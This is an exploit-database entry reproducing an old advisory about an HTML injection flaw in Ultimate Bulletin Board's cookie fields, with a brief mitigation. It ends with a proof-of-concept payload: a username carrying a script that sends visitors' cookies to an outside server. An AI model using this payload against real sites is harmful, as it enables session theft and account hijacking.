header-logo
Suggest Exploit
vendor:
Ultimate Bulletin Board
by:
SecurityFocus
6.4
CVSS
MEDIUM
HTML Injection
79
CWE
Product Name: Ultimate Bulletin Board
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2002

Ultimate Bulletin Board HTML Injection Vulnerability

Ultimate Bulletin Board has been reported to be vulnerable to HTML injection due to a lack of sanitization performed on cookie data. A remote authenticated attacker may modify fields of an Ultimate Bulletin Board cookie, and embed HTML code into several of the fields contain therein. The attacker may then use the cookie to inject HTML code into the affected forum, which will be rendered when the forum overview page or latest posts overview page are viewed.

Mitigation:

Sanitize cookie data to prevent HTML injection.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8212/info

Ultimate Bulletin Board has been reported prone to a HTML injection vulnerability.

The issue likely presents itself due to a lack of sanitization performed on cookie data. It has been reported that a remote authenticated attacker may modify fields of an Ultimate Bulletin Board cookie, and embed HTML code into several of the fields contain therein. The attacker may then use the cookie to inject HTML code into the affected forum. It has been reported that the malicious HTML code will be rendered when the forum overview page or latest posts overview page are viewed.

username<script>document.write('<img src%3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0height%3D0>')</script>